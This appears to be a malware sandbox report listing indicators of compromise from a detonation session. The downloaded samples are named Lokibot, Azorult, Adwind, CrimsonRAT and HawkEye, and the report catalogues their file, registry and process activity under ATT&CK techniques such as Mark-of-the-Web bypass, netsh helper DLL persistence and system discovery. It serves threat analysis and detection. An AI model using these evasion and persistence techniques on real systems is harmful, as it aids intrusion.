File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_2127160454\_metadata\verified_contents.json	msedge.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping7496_698300666\v1FieldTypes.json	msedge.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4660	sc.exe
2792	sc.exe
7724	sc.exe
3056	sc.exe
6948	sc.exe
6096	sc.exe
3476	sc.exe
4972	sc.exe
7712	sc.exe
7084	sc.exe
6948	sc.exe
468	sc.exe
2660	sc.exe
7300	sc.exe
664	sc.exe
6280	sc.exe
2140	sc.exe
5904	sc.exe
3704	sc.exe
7884	sc.exe
900	sc.exe
5432	sc.exe
7556	sc.exe
4184	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 13 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\butterflyondesktop(1).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\BlueScreen(1).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\MinecraftInstaller(1).exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Minecraft.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\FreeLauncher.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\BlueScreen.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\CrimsonRAT.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\MinecraftInstaller.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\HawkEye.exe:Zone.Identifier	firefox.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lokibot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileSyncConfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	OneDrive.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe

Delays execution with timeout.exe 7 IoCs

defense_evasion

pid	Process
8116	timeout.exe
6208	timeout.exe
2744	timeout.exe
4688	timeout.exe
3832	timeout.exe
6548	timeout.exe
7324	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4712	ipconfig.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
7704	taskkill.exe
2212	taskkill.exe
7796	taskkill.exe
5820	taskkill.exe
7004	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 39 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "2553450723"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31164116"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0"	iexplore.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133848445881525276"	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ = "IGetSpecialFolderInfoCallback"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ = "PSFactoryBuffer"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\odopen\shell	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_CLASSES\INTERFACE\{10C9242E-D604-49B5-99E4-BF87945EF86C}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\WOW6432Node\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\TypeLib\{082D3FEC-D0D0-4DF6-A988-053FECE7B884}\1.0\FLAGS\ = "0"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ = "IOneDriveInfoProvider"	OneDrive.exe
